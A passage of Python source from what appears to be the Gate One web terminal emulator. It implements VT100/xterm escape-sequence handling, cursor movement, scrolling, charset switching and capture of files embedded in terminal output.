:attr:`self.saved_cursorX`, :attr:`self.saved_cursorY`, and :attr:`self.saved_rendition` (if they're set). """ if self.saved_cursorX and self.saved_cursorY: self.cursorX = self.saved_cursorX self.cursorY = self.saved_cursorY self.cur_rendition = self.saved_rendition def _dsr_get_cursor_position(self): """ Returns the current cursor positition as a DSR response in the form of:: '\x1b<self.cursorY>;<self.cursorX>R' Also executes CALLBACK_DSR with the same output as the first argument. Example:: self.callbacks[CALLBACK_DSR]('\x1b20;123R') """ esc_cursor_pos = '\x1b%s;%sR' % (self.cursorY, self.cursorX) try: for callback in self.callbacks[CALLBACK_DSR].values(): callback(esc_cursor_pos) except TypeError: pass return esc_cursor_pos def _dcs_handler(self, string=None): """ Handles Device Control String sequences. Unimplemented. Probablye not appropriate for Gate One. If you believe this to be false please open a ticket in the issue tracker. """ pass #print("TODO: Handle this DCS: %s" % string) def _set_line_params(self, param): """ This function handles the control sequences that set double and single line heights and widths. It also handles the "screen alignment test" ( fill the screen with Es). .. note:: Double-line height text is currently unimplemented (does anything actually use it?). """ try: param = int(param) except ValueError: logging.warning("Couldn't handle escape sequence #%s" % repr(param)) if param == 8: # Screen alignment test self.init_renditions() self.screen = [ array('u', u'E' * self.cols) for a in xrange(self.rows)] # TODO: Get this handling double line height stuff... For kicks def set_G0_charset(self, char): """ Sets the terminal's G0 (default) charset to the type specified by *char*. Here's the possibilities:: 0 DEC Special Character and Line Drawing Set A United Kingdom (UK) B United States (USASCII) 4 Dutch C Finnish 5 Finnish R French Q French Canadian K German Y Italian E Norwegian/Danish 6 Norwegian/Danish Z Spanish H Swedish 7 Swedish = Swiss """ #logging.debug("Setting G0 charset to %s" % repr(char)) try: self.G0_charset = self.charsets[char] except KeyError: self.G0_charset = self.charsets['B'] if self.current_charset == 0: self.charset = self.G0_charset def set_G1_charset(self, char): """ Sets the terminal's G1 (alt) charset to the type specified by *char*. Here's the possibilities:: 0 DEC Special Character and Line Drawing Set A United Kingdom (UK) B United States (USASCII) 4 Dutch C Finnish 5 Finnish R French Q French Canadian K German Y Italian E Norwegian/Danish 6 Norwegian/Danish Z Spanish H Swedish 7 Swedish = Swiss """ #logging.debug("Setting G1 charset to %s" % repr(char)) try: self.G1_charset = self.charsets[char] except KeyError: self.G1_charset = self.charsets['B'] if self.current_charset == 1: self.charset = self.G1_charset def use_g0_charset(self): """ Sets the current charset to G0. This should get called when ASCII_SO is encountered. """ #logging.debug( #"Switching to G0 charset (which is %s)" % repr(self.G0_charset)) self.current_charset = 0 self.charset = self.G0_charset def use_g1_charset(self): """ Sets the current charset to G1. This should get called when ASCII_SI is encountered. """ #logging.debug( #"Switching to G1 charset (which is %s)" % repr(self.G1_charset)) self.current_charset = 1 self.charset = self.G1_charset def abort_capture(self): """ A convenience function that takes care of canceling a file capture and cleaning up the output. """ logging.debug('abort_capture()') self.cancel_capture = True self.write(b'\x00') # This won't actually get written self.send_update() self.send_message(_(u'File capture aborted.')) def write(self, chars, special_checks=True): """ Write *chars* to the terminal at the current cursor position advancing the cursor as it does so. If *chars* is not unicode, it will be converted to unicode before being stored in self.screen. if *special_checks* is True (default), Gate One will perform checks for special things like image files coming in via *chars*. """ # NOTE: This is the slowest function in all of Gate One. All # suggestions on how to speed it up are welcome! # Speedups (don't want dots in loops if they can be avoided) specials = self.specials esc_handlers = self.esc_handlers csi_handlers = self.csi_handlers RE_ESC_SEQ = self.RE_ESC_SEQ RE_CSI_ESC_SEQ = self.RE_CSI_ESC_SEQ magic = self.magic magic_map = self.magic_map changed = False # This is commented because of how noisy it is. Uncomment to debug the # terminal emualtor: #logging.debug('handling chars: %s' % repr(chars)) # Only perform special checks (for FileTYpe stuff) if we're given bytes. # Incoming unicode chars should NOT be binary data. if not isinstance(chars, bytes): special_checks = False if special_checks: before_chars = b"" after_chars = b"" if not self.capture: for magic_header in magic: try: if magic_header.match(chars): self.matched_header = magic_header self.timeout_capture = datetime.now() self.progress_timer = datetime.now() # Create an instance of the filetype self._filetype_instance() break except UnicodeEncodeError: # Gibberish; drop it and pretend it never happened logging.debug(_( "Got UnicodeEncodeError trying to check FileTypes")) self.esc_buffer = "" # Make it so it won't barf below chars = chars.encode(self.encoding, 'ignore') if self.capture or self.matched_header: self.capture += chars if self.cancel_capture: # Try to split the garbage from the post-ctrl-c output split_capture = self.RE_SIGINT.split(self.capture) after_chars = split_capture[-1] self.capture = b'' self.matched_header = None self.cancel_capture = False self.write(u'^C\r\n', special_checks=False) self.write(after_chars, special_checks=False) return ref = self.screen[self.cursorY][self.cursorX] ft_instance = self.captured_files[ref] if ft_instance.helper: ft_instance.helper(self) now = datetime.now() if now - self.progress_timer > self.message_interval: # Send an update of the progress to the user # NOTE: This message will only get sent if it takes longer # than self.message_interval to capture a file. So it is # nice and user friendly: Small things output instantly # without notifications while larger files that take longer # to capture will keep the user abreast of the progress. ft = magic_map[self.matched_header].name indicator = 'K' size = float(len(self.capture))/1024 # Kb if size > 1024: # Switch to Mb size = size/1024 indicator = 'M' message = _( "%s: %.2f%s captured..." % (ft, size, indicator)) self.notified = True self.send_message(message) self.progress_timer = datetime.now() match = ft_instance.re_capture.search(self.capture) if match: logging.debug( "Matched %s format (%s, %s). Capturing..." % ( self.magic_map[self.matched_header].name, self.cursorY, self.cursorX)) split_capture = ft_instance.re_capture.split(self.capture,1) before_chars = split_capture[0] self.capture = split_capture[1] after_chars = b"".join(split_capture[2:]) if after_chars: is_container = magic_map[self.matched_header].is_container if is_container and len(after_chars) > 500: # Could be more to this file. Let's wait until output # slows down before attempting to perform a match logging.debug( "> 500 characters after capture. Waiting for more") return else: # These need to be written before the capture so that # the FileType.capture() method can position things # appropriately. if before_chars: # Empty out self.capture temporarily so these chars # get handled properly cap_temp = self.capture self.capture = b"" # This will overwrite our ref: self.write(before_chars, special_checks=False) # Put it back for the rest of the processing self.capture = cap_temp # Perform the capture and start anew self._capture_file(ref) if self.notified: # Send a final notice of how big the file was (just # to keep things consistent). ft = magic_map[self.matched_header].name indicator = 'K' size = float(len(self.capture))/1024 # Kb if size > 1024: # Switch to Mb size = size/1024 indicator = 'M' message = _( "%s: Capture complete (%.2f%s)" % ( ft, size, indicator)) self.notified = False self.send_message(message) self.capture = b"" # Empty it now that is is captured self.matched_header = None # Ditto self.write(after_chars, special_checks=True) return return # Have to convert to unicode try: chars = chars.decode(self.encoding, "handle_special") except UnicodeDecodeError: # Just in case try: chars = chars.decode(self.encoding, "ignore") except UnicodeDecodeError: logging.error( _("Double UnicodeDecodeError in terminal.Terminal.")) return except AttributeError: # In Python 3 strings don't have .decode() pass # Already Unicode for char in chars: charnum = ord(char) if charnum in specials: specials[charnum]() else: # Now handle the regular characters and escape sequences if self.esc_buffer: # We've got an escape sequence going on... try: self.esc_buffer += char # First try to handle non-CSI ESC sequences (the basics) match_obj = RE_ESC_SEQ.match(self.esc_buffer) if match_obj: seq_type = match_obj.group(1) # '\x1bA' -> 'A' # Call the matching ESC handler #logging.debug('ESC seq: %s' % seq_type) if len(seq_type) == 1: # Single-character sequnces esc_handlers[seq_type]() else: # Multi-character stuff like '\x1b)B' esc_handlers[seq_type[0]](seq_type[1:]) self.esc_buffer = '' # All done with this one continue # Next try to handle CSI ESC sequences match_obj = RE_CSI_ESC_SEQ.match(self.esc_buffer) if match_obj: csi_values = match_obj.group(1) # e.g. '0;1;37' csi_type = match_obj.group(2) # e.g. 'm' #logging.debug( #'CSI: %s, %s' % (csi_type, csi_values)) # Call the matching CSI handler try: csi_handlers[csi_type](csi_values) except ValueError: # Commented this out because it can be super noisy #logging.error(_( #"CSI Handler Error: Type: %s, Values: %s" % #(csi_type, csi_values) #)) pass self.esc_buffer = '' continue except KeyError: # No handler for this, try some alternatives if self.esc_buffer.endswith('\x1b\\'): self._osc_handler() else: logging.warning(_( "Warning: No ESC sequence handler for %s" % repr(self.esc_buffer) )) self.esc_buffer = '' continue # We're done here changed = True if self.cursorX >= self.cols: self.cursorX = 0 self.newline() # Non-autowrap has been disabled due to issues with browser # wrapping. #if self.expanded_modes['7']: #self.cursorX = 0 #self.newline() #else: #self.screen[self.cursorY].append(u' ') # Make room #self.renditions[self.cursorY].append(u' ') try: self.renditions[self.cursorY][ self.cursorX] = self.cur_rendition if self.insert_mode: # Insert mode dictates that we move everything to the # right for every character we insert. Normally the # program itself will take care of this but older # programs and shells will simply set call ESC[4h, # insert the character, then call ESC[4i to return the # terminal to its regular state. self.insert_characters(1) if charnum in self.charset: char = self.charset[charnum] self.screen[self.cursorY][self.cursorX] = char else: # Double check this isn't a unicode diacritic (accent) # which simply modifies the character before it if unicodedata.combining(char): # This is a diacritic. Combine it with existing: current = self.screen[self.cursorY][self.cursorX] combined = unicodedata.normalize( 'NFC', u'%s%s' % (current, char)) # Sometimes a joined combining char can still result # a string of length > 1. So we need to handle that if len(combined) > 1: for i, c in enumerate(combined): self.screen[self.cursorY][ self.cursorX] = c if i < len(combined) - 1: self.cursorX += 1 else: self.screen[self.cursorY][ self.cursorX] = combined else: # Normal character self.screen[self.cursorY][self.cursorX] = char except IndexError as e: # This can happen when escape sequences go haywire # Only log the error if debugging is enabled (because we # really don't care that much 99% of the time) logger = logging.getLogger() if logger.level < 20: logging.error(_( "IndexError in write(): %s" % e)) import traceback, sys traceback.print_exc(file=sys.stdout) self.cursorX += 1 #self.cursor_right() self.prev_char = char if changed: self.modified = True # Execute our callbacks self.send_update() self.send_cursor_update() def flush(self): """ Only here to make Terminal compatible with programs that want to use file-like methods. """ pass def scroll_up(self, n=1): """ Scrolls up the terminal screen by *n* lines (default: 1). The callbacks CALLBACK_CHANGED and CALLBACK_SCROLL_UP are called after scrolling the screen. .. note:: This will only scroll up the region within `self.top_margin` and `self.bottom_margin` (if set). """ #logging.debug("scroll_up(%s)" % n) empty_line = array('u', u' ' * self.cols) # Line full of spaces empty_rend = array('u', unichr(1000) * self.cols) for x in xrange(int(n)): line = self.screen.pop(self.top_margin) # Remove the top line self.scrollback_buf.append(line) # Add it to the scrollback buffer if len(self.scrollback_buf) > self.max_scrollback: self.init_scrollback() # NOTE: This would only be the # of lines piled up before the # next dump_html() or dump(). # Add it to the bottom of the window: self.screen.insert(self.bottom_margin, empty_line[:]) # A copy # Remove top line's rendition information rend = self.renditions.pop(self.top_margin) self.scrollback_renditions.append(rend) # Insert a new empty rendition as well: self.renditions.insert(self.bottom_margin, empty_rend[:]) # Execute our callback indicating lines have been updated try: for callback in self.callbacks[CALLBACK_CHANGED].values(): callback() except TypeError: pass # Execute our callback to scroll up the screen try: for callback in self.callbacks[CALLBACK_SCROLL_UP].values(): callback() except TypeError: pass def scroll_down(self, n=1): """ Scrolls down the terminal screen by *n* lines (default: 1). The callbacks CALLBACK_CHANGED and CALLBACK_SCROLL_DOWN are called after scrolling the screen. """ #logging.debug("scroll_down(%s)" % n) for x in xrange(int(n)): self.screen.pop(self.bottom_margin) # Remove the bottom line empty_line = array('u', u' ' * self.cols) # Line full of spaces self.screen.insert(self.top_margin, empty_line) # Add it to the top # Remove bottom line's style information: self.renditions.pop(self.bottom_margin) # Insert a new empty one: empty_line = array('u', unichr(1000) * self.cols) self.renditions.insert(self.top_margin, empty_line) # Execute our callback indicating lines have been updated try: for callback in self.callbacks[CALLBACK_CHANGED].values(): callback() except TypeError: pass # Execute our callback to scroll up the screen try: for callback in self.callbacks[CALLBACK_SCROLL_UP].values(): callback() except TypeError: pass def insert_line(self, n=1): """ Inserts *n* lines at the current cursor position. """ #logging.debug("insert_line(%s)" % n) if not n: # Takes care of an empty string n = 1 n = int(n) for i in xrange(n): self.screen.pop(self.bottom_margin) # Remove the bottom line # Remove bottom line's style information as well: self.renditions.pop(self.bottom_margin) empty_line = array('u', u' ' * self.cols) # Line full of spaces self.screen.insert(self.cursorY, empty_line) # Insert at cursor # Insert a new empty rendition as well: empty_rend = array('u', unichr(1000) * self.cols) self.renditions.insert(self.cursorY, empty_rend) # Insert at cursor def delete_line(self, n=1): """ Deletes *n* lines at the current cursor position. """ #logging.debug("delete_line(%s)" % n) if not n: # Takes care of an empty string n = 1 n = int(n) for i in xrange(n): self.screen.pop(self.cursorY) # Remove the line at the cursor # Remove the line's style information as well: self.renditions.pop(self.cursorY) # Now add an empty line and empty set of renditions to the bottom of # the view empty_line = array('u', u' ' * self.cols) # Line full of spaces # Add it to the bottom of the view: self.screen.insert(self.bottom_margin, empty_line) # Insert at bottom # Insert a new empty rendition as well: empty_rend = array('u', unichr(1000) * self.cols) self.renditions.insert(self.bottom_margin, empty_rend) def backspace(self): """Execute a backspace (\\x08)""" self.cursor_left(1) def horizontal_tab(self): """Execute horizontal tab (\\x09)""" for stop in sorted(self.tabstops): if self.cursorX < stop: self.cursorX = stop + 1 break else: self.cursorX = self.cols - 1 def _set_tabstop(self): """Sets a tabstop at the current position of :attr:`self.cursorX`.""" if self.cursorX not in self.tabstops: for tabstop in self.tabstops: if self.cursorX > tabstop: self.tabstops.add(self.cursorX) break def linefeed(self): """ LF - Executes a line feed. .. note:: This actually just calls :meth:`Terminal.newline`. """ self.newline() def next_line(self): """ CNL - Moves the cursor down one line to the home position. Will not result in a scrolling event like newline() does. .. note:: This is not the same thing as :meth:`Terminal.cursor_next_line` which preserves the cursor's column position. """ self.cursorX = self.cursor_home if self.cursorY < self.rows -1: self.cursorY += 1 def reverse_linefeed(self): """ RI - Executes a reverse line feed: Move the cursor up one line to the home position. If the cursor move would result in going past the top margin of the screen (upwards) this will execute a scroll_down() event. """ self.cursorX = 0 self.cursorY -= 1 if self.cursorY < self.top_margin: self.scroll_down() self.cursorY = self.top_margin def newline(self): """ Increases :attr:`self.cursorY` by 1 and calls :meth:`Terminal.scroll_up` if that action will move the curor past :attr:`self.bottom_margin` (usually the bottom of the screen). """ cols = self.cols self.cursorY += 1 if self.cursorY > self.bottom_margin: self.scroll_up() self.cursorY = self.bottom_margin self.clear_line() # Shorten the line if it is longer than the number of columns # NOTE: This lets us keep the width of existing lines even if the number # of columns is reduced while at the same time accounting for apps like # 'top' that merely overwrite existing lines. If we didn't do this # the output from 'top' would get all messed up from leftovers at the # tail end of every line when self.cols had a larger value. if len(self.screen[self.cursorY]) >= cols: self.screen[self.cursorY] = self.screen[self.cursorY][:cols] self.renditions[self.cursorY] = self.renditions[self.cursorY][:cols] # NOTE: The above logic is placed inside of this function instead of # inside self.write() in order to reduce CPU utilization. There's no # point in performing a conditional check for every incoming character # when the only time it will matter is when a newline is being written. def carriage_return(self): """ Executes a carriage return (sets :attr:`self.cursorX` to 0). In other words it moves the cursor back to position 0 on the line. """ if self.cursorX == 0: return # Nothing to do if divmod(self.cursorX, self.cols+1)[1] == 0: # A carriage return at the precise end of line means the program is # assuming vt100-style autowrap. Since we let the browser handle # that we need to discard this carriage return since we're not # actually making a newline. if self.prev_char not in [u'\x1b', u'\n']: # These are special cases where the underlying shell is assuming # autowrap so we have to emulate it. self.newline() else: return if not self.capture: self.cursorX = 0 def _xon(self): """ Handles the XON character (stop ignoring). .. note:: Doesn't actually do anything (this feature was probably meant for the underlying terminal program). """ logging.debug('_xon()') self.local_echo = True def _xoff(self): """ Handles the XOFF character (start ignoring) .. note:: Doesn't actually do anything (this feature was probably meant for the underlying terminal program). """ logging.debug('_xoff()') self.local_echo = False def _cancel_esc_sequence(self): """ Cancels any escape sequence currently being processed. In other words it empties :attr:`self.esc_buffer`. """ self.esc_buffer = '' def _sub_esc_sequence(self): """ Cancels any escape sequence currently in progress and replaces :attr:`self.esc_buffer` with single question mark (?). .. note:: Nothing presently uses this function and I can't remember what it was supposed to be part of (LOL!). Obviously it isn't very important. """ self.esc_buffer = '' self.write('?') def _escape(self): """ Handles the escape character as well as escape sequences that may end with an escape character. """ buf = self.esc_buffer if buf.startswith('\x1bP') or buf.startswith('\x1b]'): # CSRs and OSCs are special self.esc_buffer += '\x1b' else: # Get rid of whatever's there since we obviously didn't know what to # do with it self.esc_buffer = '\x1b' def _csi(self): """ Marks the start of a CSI escape sequence (which is itself a character) by setting :attr:`self.esc_buffer` to '\\\\x1b[' (which is the CSI escape sequence). """ self.esc_buffer = '\x1b[' def _filetype_instance(self): """ Instantiates a new instance of the given :class:`FileType` (using `self.matched_header`) and stores the result in `self.captured_files` and creates a reference to that location at the current cursor location. """ ref = self.file_counter.next() logging.debug("_filetype_instance(%s)" % repr(ref)) # Before doing anything else we need to mark the current cursor # location as belonging to our file self.screen[self.cursorY][self.cursorX] = ref # Create an instance of the filetype we can reference filetype_instance = self.magic_map[self.matched_header]( path=self.temppath, linkpath=self.linkpath, icondir=self.icondir) self.captured_files[ref] = filetype_instance def _capture_file(self, ref): """ This function gets called by :meth:`Terminal.write` when the incoming character stream matches a value in :attr:`self.magic`. It will call whatever function is associated with the matching regex in :attr:`self.magic_map`. It also stores the current file capture reference (*ref*) at the current cursor location. """ logging.debug("_capture_file(%s)" % repr(ref)) self.screen[self.cursorY][self.cursorX] = ref filetype_instance = self.captured_files[ref] filetype_instance.capture(self.capture, self) # Start up an open file watcher so leftover file objects get # closed when they're no longer being used if not self.watcher or not self.watcher.isAlive(): import threading self.watcher = threading.Thread( name='watcher', target=self._captured_fd_watcher) self.watcher.setDaemon(True) self.watcher.start() return def _captured_fd_watcher(self): """ Meant to be run inside of a thread, calls :meth:`Terminal.close_captured_fds` until there are no more open image file descriptors. """ logging.debug("starting _captured_fd_watcher()") import time self.quitting = False while not self.quitting: if self.captured_files: self.close_captured_fds() time.sleep(5) else: self.quitting = True logging.debug('_captured_fd_watcher() quitting: No more images.') def close_captured_fds(self): """ Closes the file descriptors of any captured files that are no longer on the screen. """ #logging.debug('close_captured_fds()') # Commented because it's kinda noisy if self.captured_files: for ref in list(self.captured_files.keys()): found = False for line in self.screen: if ref in line: found = True break if self.alt_screen: for line in self.alt_screen: if ref in line: found = True break if not found: try: self.captured_files[ref].close() except AttributeError: pass # File already closed or never captured properly del self.captured_files[ref] def _string_terminator(self): """ Handle the string terminator (ST). .. note:: Doesn't actually do anything at the moment. Probably not needed since :meth:`Terminal._escape` and/or :meth:`Terminal.bell` will end up handling any sort of sequence that would end in an ST anyway. """ # NOTE: Might this just call _cancel_esc_sequence? I need to double-check. pass def _osc_handler(self): """ Handles Operating System Command (OSC) escape sequences which need special care since they are of indeterminiate length and end with either a bell (\\\\x07) or a sequence terminator (\\\\x9c aka ST). This will usually be called from :meth:`Terminal.bell` to set the title of the terminal (just like an xterm) but it is also possible to be called directly whenever an ST is encountered. """ # Try the title sequence first match_obj = self.RE_TITLE_SEQ.match(self.esc_buffer) if match_obj: self.esc_buffer = '' title = match_obj.group(1) self.set_title(title) # Sets self.title return # Next try our special optional handler sequence match_obj = self.RE_OPT_SEQ.match(self.esc_buffer) if match_obj: self.esc_buffer = '' text = match_obj.group(1) self._opt_handler(text) return # At this point we've encountered something unusual logging.warning(_("Warning: No special ESC sequence handler for %s" % repr(self.esc_buffer))) self.esc_buffer = '' def bell(self): """ Handles the bell character and executes :meth:`Terminal.callbacks[CALLBACK_BELL]` (if we are not in the middle of an escape sequence that ends with a bell character =). If we *are* in the middle of an escape sequence, calls :meth:`self._osc_handler` since we can be nearly certain that we're simply terminating an OSC sequence. Isn't terminal emulation grand? ⨀_⨀ """ # NOTE: A little explanation is in order: The bell character (\x07) by # itself should play a bell (pretty straighforward). However, if # the bell character is at the tail end of a particular escape # sequence (string starting with \x1b]0;) this indicates an xterm # title (everything between \x1b]0;...\x07). if not self.esc_buffer: # We're not in the middle of an esc sequence logging.debug('Regular bell') try: for callback in self.callbacks[CALLBACK_BELL].values(): callback() except TypeError: pass else: # We're (likely) setting a title self.esc_buffer += '\x07' # Add the bell char so we don't lose it self._osc_handler() def _device_status_report(self, n=None): """ Returns '\\\\x1b[0n' (terminal OK) and executes: .. code-block:: python self.callbacks[CALLBACK_DSR]("\\x1b[0n") """ logging.debug("_device_status_report()") response = u"\x1b[0n" try: for callback in self.callbacks[CALLBACK_DSR].values(): callback(response) except TypeError: pass return response def _csi_device_identification(self, request=None): """ If we're responding to ^[Z, ^[c, or ^[0c, returns '\\\\x1b[1;2c' (Meaning: I'm a vt220 terminal, version 1.0) and executes: .. code-block:: python self.callbacks[self.CALLBACK_DSR]("\\x1b[1;2c") If we're responding to ^[>c or ^[>0c, executes: .. code-block:: python self.callbacks[self.CALLBACK_DSR]("\\x1b[>0;271;0c") """ logging.debug("_csi_device_identification(%s)" % request) if request and u">" in request: response = u"\x1b[>0;271;0c" else: response = u"\x1b[?1;2c" try: for callback in self.callbacks[CALLBACK_DSR].values(): callback(response) except TypeError: pass return response def _csi_device_status_report(self, request=None): """ Calls :meth:`self.callbacks[self.CALLBACK_DSR]` with an appropriate response to the given *request*. .. code-block:: python self.callbacks[self.CALLBACK_DSR](response) Supported requests and their responses: ============================= ================== Request Response ============================= ================== ^[5n (Status Report) ^[[0n ^[6n (Report Cursor Position) ^[[<row>;<column>R ^[15n (Printer Ready?) ^[[10n (Ready) ============================= ================== """ logging.debug("_csi_device_status_report(%s)" % request) supported_requests = [ u"5", u"6", u"15", ] if not request: return # Nothing to do response = u"" if request.startswith('?'): # Get rid of it request = request[1:] if request in supported_requests: if request == u"5": response = u"\x1b[0n" elif request == u"6": rows = self.cursorY + 1 cols = self.cursorX + 1 response = u"\x1b[%s;%sR" % (rows, cols) elif request == u"15": response = u"\x1b[10n" try: for callback in self.callbacks[CALLBACK_DSR].values(): callback(response) except TypeError: pass return response def set_expanded_mode(self, setting): """ Accepts "standard mode" settings. Typically '\\\\x1b[?25h' to hide cursor. Notes on modes:: '?1h' - Application Cursor Keys '?5h' - DECSCNM (default off): Set reverse-video mode '?7h' - DECAWM: Autowrap mode '?12h' - Local echo (SRM or Send Receive Mode) '?25h' - Hide cursor '?1000h' - Send Mouse X/Y on button press and release '?1001h' - Use Hilite Mouse Tracking '?1002h' - Use Cell Motion Mouse Tracking '?1003h' - Use All Motion Mouse Tracking '?1004h' - Send focus in/focus out events '?1005h' - Enable UTF-8 Mouse Mode '?1006h' - Enable SGR Mouse Mode '?1015h' - Enable urxvt Mouse Mode '?1049h' - Save cursor and screen """ # TODO: Add support for the following: # * 3: 132 column mode (might be "or greater") # * 4: Smooth scroll (for animations and also makes things less choppy) # * 5: Reverse video (should be easy: just need some extra CSS) # * 6: Origin mode # * 7: Wraparound mode logging.debug("set_expanded_mode(%s)" % setting) if setting.startswith('?'): # DEC Private Mode Set setting = setting[1:] # Don't need the ? settings = setting.split(';') for setting in settings: try: self.expanded_mode_handlers[setting](True) except (KeyError, TypeError): pass # Unsupported expanded mode try: for callback in self.callbacks[CALLBACK_MODE].values(): callback(setting, True) except TypeError: pass else: # There's a couple mode settings that are just "[Nh" where N==number # [2h Keyboard Action Mode (AM) # [4h Insert Mode # [12h Send/Receive Mode (SRM) # [24h Automatic Newline (LNM) if setting == '4': self.insert_mode = True def reset_expanded_mode(self, setting): """ Accepts "standard mode" settings. Typically '\\\\x1b[?25l' to show cursor. """ logging.debug("reset_expanded_mode(%s)" % setting) if setting.startswith('?'): setting = setting[1:] # Don't need the ? settings = setting.split(';') for setting in settings: try: self.expanded_mode_handlers[setting](False) except (KeyError, TypeError): pass # Unsupported expanded mode try: for callback in self.callbacks[CALLBACK_MODE].values(): callback(setting, False) except TypeError: pass else: # There's a couple mode settings that are just "[Nh" where N==number # [2h Keyboard Action Mode (AM) # [4h Insert Mode # [12h Send/Receive Mode (SRM) # [24h Automatic Newline (LNM) # The only one we care about is 4 (insert mode) if setting == '4': self.insert_mode = False def toggle_alternate_screen_buffer(self, alt): """ If *alt* is True, copy the current screen and renditions to :attr:`self.alt_screen` and :attr:`self.alt_renditions` then re-init :attr:`self.screen` and :attr:`self.renditions`. If *alt* is False, restore the saved screen buffer and renditions then nullify :attr:`self.alt_screen` and :attr:`self.alt_renditions`. """ #logging.debug('toggle_alternate_screen_buffer(%s)' % alt) if alt: # Save the existing screen and renditions self.alt_screen = self.screen[:] self.alt_renditions = self.renditions[:] # Make a fresh one self.clear_screen() else: # Restore the screen if self.alt_screen and self.alt_renditions: self.screen = self.alt_screen[:] self.renditions = self.alt_renditions[:] # Empty out the alternate buffer (to save memory) self.alt_screen = None self.alt_renditions = None # These all need to be reset no matter what self.cur_rendition = unichr(1000) def toggle_alternate_screen_buffer_cursor(self, alt): """ Same as :meth:`Terminal.toggle_alternate_screen_buffer` but also saves/restores the cursor location. """ #logging.debug('toggle_alternate_screen_buffer_cursor(%s)' % alt) if alt: self.alt_cursorX = self.cursorX self.alt_cursorY = self.cursorY else: self.cursorX = self.alt_cursorX self.cursorY = self.alt_cursorY self.toggle_alternate_screen_buffer(alt) def expanded_mode_toggle(self, mode, boolean): """ Meant to be used with (simple) expanded mode settings that merely set or reset attributes for tracking purposes; sets `self.expanded_modes[mode]` to *boolean*. Example usage:: >>> self.expanded_mode_handlers['1000'] = partial(self.expanded_mode_toggle, 'mouse_button_events') """ self.expanded_modes[mode] = boolean def insert_characters(self, n=1): """ Inserts the specified number of characters at the cursor position. Overwriting whatever is already present. """ #logging.debug("insert_characters(%s)" % n) n = int(n) for i in xrange(n): self.screen[self.cursorY].pop() # Take one down, pass it around self.screen[self.cursorY].insert(self.cursorX, u' ') def delete_characters(self, n=1): """ DCH - Deletes (to the left) the specified number of characters at the cursor position. As characters are deleted, the remaining characters between the cursor and right margin move to the left. Character attributes (renditions) move with the characters. The terminal adds blank spaces with no visual character attributes at the right margin. DCH has no effect outside the scrolling margins. .. note:: Deletes renditions too. You'd *think* that would be in one of the VT-* manuals... Nope! """ #logging.debug("delete_characters(%s)" % n) if not n: # e.g. n == '' n = 1 else: n = int(n) for i in xrange(n): try: self.screen[self.cursorY].pop(self.cursorX) self.screen[self.cursorY].append(u' ') self.renditions[self.cursorY].pop(self.cursorX) self.renditions[self.cursorY].append(unichr(1000)) except IndexError: # At edge of screen, ignore #print('IndexError in delete_characters(): %s' % e) pass def _erase_characters(self, n=1): """ Erases (to the right) the specified number of characters at the cursor position. .. note:: Deletes renditions too. """ #logging.debug("_erase_characters(%s)" % n) if not n: # e.g. n == '' n = 1 else: n = int(n) distance = self.cols - self.cursorX n = min(n, distance) for i in xrange(n): self.screen[self.cursorY][self.cursorX+i] = u' ' self.renditions[self.cursorY][self.cursorX+i] = unichr(1000) def cursor_left(self, n=1): """ESCnD CUB (Cursor Back)""" # Commented out to save CPU (and the others below too) #logging.debug('cursor_left(%s)' % n) n = int(n) # This logic takes care of double-width unicode characters if self.double_width_left: self.double_width_left = False return self.cursorX = max(0, self.cursorX - n) # Ensures positive value try: char = self.screen[self.cursorY][self.cursorX] except IndexError: # Cursor is past the right-edge of the screen; ignore char = u' ' # This is a safe default/fallback if unicodedata.east_asian_width(char) == 'W': # This lets us skip the next call (get called 2x for 2x width) self.double_width_left = True try: for callback in self.callbacks[CALLBACK_CURSOR_POS].values(): callback() except TypeError: pass def cursor_right(self, n=1): """ESCnC CUF (Cursor Forward)""" #logging.debug('cursor_right(%s)' % n) if not n: n = 1 n = int(n) # This logic takes care of double-width unicode characters if self.double_width_right: self.double_width_right = False return self.cursorX += n try: char = self.screen[self.cursorY][self.cursorX] except IndexError: # Cursor is past the right-edge of the screen; ignore char = u' ' # This is a safe default/fallback if unicodedata.east_asian_width(char) == 'W': # This lets us skip the next call (get called 2x for 2x width) self.double_width_right = True try: for callback in self.callbacks[CALLBACK_CURSOR_POS].values(): callback() except TypeError: pass def cursor_up(self, n=1): """ESCnA CUU (Cursor Up)""" #logging.debug('cursor_up(%s)' % n) if not n: n = 1 n = int(n) self.cursorY = max(0, self.cursorY - n) try: for callback in self.callbacks[CALLBACK_CURSOR_POS].values(): callback() except TypeError: pass def cursor_down(self, n=1): """ESCnB CUD (Cursor Down)""" #logging.debug('cursor_down(%s)' % n) if not n: n = 1 n = int(n) self.cursorY = min(self.rows, self.cursorY + n) try: for callback in self.callbacks[CALLBACK_CURSOR_POS].values(): callback() except TypeError: pass def cursor_next_line(self, n): """ESCnE CNL (Cursor Next Line)""" #logging.debug("cursor_next_line(%s)" % n) if not n: n = 1 n = int(n) self.cursorY = min(self.rows, self.cursorY + n) self.cursorX = 0 try: for callback in self.callbacks[CALLBACK_CURSOR_POS].values(): callback() except TypeError: pass def cursor_previous_line(self, n): """ESCnF CPL (Cursor Previous Line)""" #logging.debug("cursor_previous_line(%s)" % n) if not n: n = 1 n = int(n) self.cursorY = max(0, self.cursorY - n) self.cursorX = 0 try: for callback in self.callbacks[CALLBACK_CURSOR_POS].values(): callback() except TypeError: pass def cursor_horizontal_absolute(self, n): """ESCnG CHA (Cursor Horizontal Absolute)""" if not n: n = 1 n = int(n) self.cursorX = n - 1 # -1 because cols is 0-based try: for callback in self.callbacks[CALLBACK_CURSOR_POS].values(): callback() except TypeError: pass def cursor_position(self, coordinates): """ ESCnH CUP (Cursor Position). Move the cursor to the given coordinates. :coordinates: Should be something like, 'row;col' (1-based) but, 'row', 'row;', and ';col' are also valid (assumes 1 on missing value). .. note:: If coordinates is '' (an empty string), the cursor will be moved to the top left (1;1). """ # NOTE: Since this is 1-based we have to subtract 1 from everything to # match how we store these values internally. if not coordinates: row, col = 0, 0 elif ';' in coordinates: row, col = coordinates.split(';') else: row = coordinates col = 0 try: row = int(row) except ValueError: row = 0 try: col = int(col) except ValueError: col = 0 # These ensure a positive integer while reducing row and col by 1: row = max(0, row - 1) col = max(0, col - 1) self.cursorY = row # The column needs special attention in case there's double-width # characters. double_width = 0 if self.cursorY < self.rows: for i, char in enumerate(self.screen[self.cursorY]): if i == col - double_width: # No need to continue further break if unicodedata.east_asian_width(char) == 'W': double_width += 1 if double_width: col = col - double_width self.cursorX = col try: for callback in self.callbacks[CALLBACK_CURSOR_POS].values(): callback() except TypeError: pass def cursor_position_vertical(self, n): """ Vertical Line Position Absolute 